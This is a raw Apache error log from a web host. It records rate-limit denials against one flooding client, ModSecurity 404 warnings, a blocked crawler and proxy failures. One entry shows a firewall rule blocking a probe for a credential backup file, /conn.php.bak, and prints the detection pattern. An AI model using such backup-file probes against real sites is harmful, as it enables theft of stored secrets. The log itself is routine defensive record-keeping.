[Tue May 26 19:54:37.242647 2026] [qos:error] [pid 86490:tid 86701] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCDAAAANY
[Tue May 26 19:54:37.244064 2026] [qos:error] [pid 86490:tid 86654] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCDQAAAKc
[Tue May 26 19:54:37.248717 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:49336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCDgAAAOw
[Tue May 26 19:54:37.272968 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRtwAAACs"]
[Tue May 26 19:54:37.280086 2026] [security2:error] [pid 93868:tid 94290] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25JzgAAAa8"]
[Tue May 26 19:54:37.284022 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J1wAAAbY"]
[Tue May 26 19:54:37.294481 2026] [security2:error] [pid 86490:tid 86716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI1ZMwN0DpLVWo6LBdQAAAOU"]
[Tue May 26 19:54:37.294772 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRsQAAADI"]
[Tue May 26 19:54:37.294788 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J3wAAAdQ"]
[Tue May 26 19:54:37.312067 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J4QAAAc8"]
[Tue May 26 19:54:37.313864 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J6AAAAaU"]
[Tue May 26 19:54:37.326770 2026] [security2:error] [pid 86490:tid 86737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBgAAAAPo"]
[Tue May 26 19:54:37.329949 2026] [security2:error] [pid 93868:tid 94269] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J9QAAAZo"]
[Tue May 26 19:54:37.337453 2026] [security2:error] [pid 93576:tid 93744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRtgAAACA"]
[Tue May 26 19:54:37.340122 2026] [security2:error] [pid 93868:tid 94328] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI0qK9k_ZUB2Vp25J9gAAAdU"]
[Tue May 26 19:54:37.352862 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRtQAAAEY"]
[Tue May 26 19:54:37.356193 2026] [security2:error] [pid 93868:tid 94298] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KBgAAAbc"]
[Tue May 26 19:54:37.357607 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszRzAAAADo"]
[Tue May 26 19:54:37.368460 2026] [security2:error] [pid 93576:tid 93835] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtI2DRMqfxdEDkoszR0AAAAHs"]
[Tue May 26 19:54:37.376984 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KAgAAAcA"]
[Tue May 26 19:54:37.384333 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBoQAAANc"]
[Tue May 26 19:54:37.394273 2026] [security2:error] [pid 86490:tid 86668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBkQAAALU"]
[Tue May 26 19:54:37.400418 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KBAAAAf0"]
[Tue May 26 19:54:37.406851 2026] [security2:error] [pid 93868:tid 94373] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KBQAAAgI"]
[Tue May 26 19:54:37.408090 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJGDRMqfxdEDkoszR1wAAAFw"]
[Tue May 26 19:54:37.408284 2026] [security2:error] [pid 86490:tid 86711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBngAAAOA"]
[Tue May 26 19:54:37.422681 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KAwAAAbI"]
[Tue May 26 19:54:37.428792 2026] [security2:error] [pid 86490:tid 86699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBpgAAANQ"]
[Tue May 26 19:54:37.439744 2026] [security2:error] [pid 93868:tid 94323] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KEwAAAdA"]
[Tue May 26 19:54:37.441456 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KAAAAAak"]
[Tue May 26 19:54:37.446226 2026] [security2:error] [pid 86490:tid 86721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBsQAAAOo"]
[Tue May 26 19:54:37.457691 2026] [security2:error] [pid 93868:tid 94271] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KFAAAAZw"]
[Tue May 26 19:54:37.459331 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJGDRMqfxdEDkoszR2AAAAGI"]
[Tue May 26 19:54:37.464430 2026] [security2:error] [pid 86490:tid 86743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBpwAAAQA"]
[Tue May 26 19:54:37.466952 2026] [security2:error] [pid 86490:tid 86679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBnAAAAMA"]
[Tue May 26 19:54:37.580572 2026] [qos:error] [pid 86490:tid 86665] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCWQAAALI
[Tue May 26 19:54:37.580746 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCWAAAANA
[Tue May 26 19:54:37.601133 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCXQAAAIc
[Tue May 26 19:54:37.603267 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJWDRMqfxdEDkoszSBwAAAEM
[Tue May 26 19:54:37.611316 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCXwAAAM4
[Tue May 26 19:54:37.614995 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCYAAAAQQ
[Tue May 26 19:54:37.616867 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCYQAAALk
[Tue May 26 19:54:37.617137 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCYgAAAQA
[Tue May 26 19:54:37.618882 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCYwAAAJo
[Tue May 26 19:54:37.645516 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCZAAAAKY
[Tue May 26 19:54:37.652794 2026] [security2:error] [pid 86490:tid 86665] [client 92.222.108.124:62912] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahWtJVZMwN0DpLVWo6LCZQAAALI"]
[Tue May 26 19:54:37.652906 2026] [security2:error] [pid 86490:tid 86665] [client 92.222.108.124:62912] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "jetstarprojects.com"] [uri "/robots.txt"] [unique_id "ahWtJVZMwN0DpLVWo6LCZQAAALI"]
[Tue May 26 19:54:37.731294 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCZwAAAPY
[Tue May 26 19:54:37.733379 2026] [qos:error] [pid 86490:tid 86635] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCaAAAAJQ
[Tue May 26 19:54:37.751820 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCaQAAALg
[Tue May 26 19:54:37.755938 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJWDRMqfxdEDkoszSCAAAAB0
[Tue May 26 19:54:37.766673 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCawAAAQQ
[Tue May 26 19:54:37.768896 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCbAAAALk
[Tue May 26 19:54:37.769847 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCbQAAAQA
[Tue May 26 19:54:37.770937 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCbgAAAJo
[Tue May 26 19:54:37.771567 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCbwAAAJo
[Tue May 26 19:54:37.777044 2026] [proxy:error] [pid 86490:tid 86665] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:37.777111 2026] [proxy_http:error] [pid 86490:tid 86665] [client 142.248.80.176:25612] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:37.778002 2026] [proxy:error] [pid 86490:tid 86665] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:54:37.778050 2026] [proxy_http:error] [pid 86490:tid 86665] [client 142.248.80.176:25612] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:54:37.798401 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCcQAAAPY
[Tue May 26 19:54:37.881548 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCcgAAALg
[Tue May 26 19:54:37.886271 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCcwAAAPE
[Tue May 26 19:54:37.906239 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCdQAAAKw
[Tue May 26 19:54:37.907977 2026] [qos:error] [pid 93576:tid 93746] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJWDRMqfxdEDkoszSDAAAACI
[Tue May 26 19:54:37.924161 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCdgAAALk
[Tue May 26 19:54:37.926058 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCdwAAAQA
[Tue May 26 19:54:37.928412 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCeAAAAJo
[Tue May 26 19:54:37.929213 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCeQAAAJo
[Tue May 26 19:54:37.951000 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJVZMwN0DpLVWo6LCewAAAPY
[Tue May 26 19:54:38.031937 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCfAAAAIc
[Tue May 26 19:54:38.035904 2026] [security2:error] [pid 86490:tid 86645] [client 157.40.161.252:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtJVZMwN0DpLVWo6LCXgAAAJ4"]
[Tue May 26 19:54:38.039942 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:34968] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCfQAAALg
[Tue May 26 19:54:38.057643 2026] [qos:error] [pid 86490:tid 86728] [client 45.148.10.120:56888] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCfgAAAPE
[Tue May 26 19:54:38.060261 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJmDRMqfxdEDkoszSDQAAADc
[Tue May 26 19:54:38.069778 2026] [security2:error] [pid 86490:tid 86680] [client 185.177.72.53:64328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/conn.php.bak"] [unique_id "ahWtJlZMwN0DpLVWo6LCfwAAAME"]
[Tue May 26 19:54:38.078436 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCgAAAAOw
[Tue May 26 19:54:38.079213 2026] [qos:error] [pid 86490:tid 86659] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCgQAAAKw
[Tue May 26 19:54:38.082453 2026] [qos:error] [pid 86490:tid 86747] [client 45.148.10.120:34842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCggAAAQQ
[Tue May 26 19:54:38.087340 2026] [qos:error] [pid 86490:tid 86672] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LCgwAAALk
[Tue May 26 19:54:38.103898 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:49332] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LChAAAAKY
[Tue May 26 19:54:38.238179 2026] [qos:error] [pid 93868:tid 94301] [client 45.148.10.120:49360] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJkqK9k_ZUB2Vp25KPwAAAbo
[Tue May 26 19:54:38.269728 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:34984] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtJlZMwN0DpLVWo6LChwAAAOw
[Tue May 26 19:54:38.276983 2026] [security2:error] [pid 93868:tid 94274] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KDQAAAZ8"]
[Tue May 26 19:54:38.280271 2026] [security2:error] [pid 86490:tid 86687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBqQAAAMg"]
[Tue May 26 19:54:38.289832 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJEqK9k_ZUB2Vp25KEgAAAd0"]
[Tue May 26 19:54:38.292816 2026] [security2:error] [pid 86490:tid 86629] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBpQAAAI4"]
[Tue May 26 19:54:38.305854 2026] [security2:error] [pid 86490:tid 86685] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBqAAAAMY"]
[Tue May 26 19:54:38.307133 2026] [security2:error] [pid 86490:tid 86731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtJFZMwN0DpLVWo6LBvQAAAPQ"]
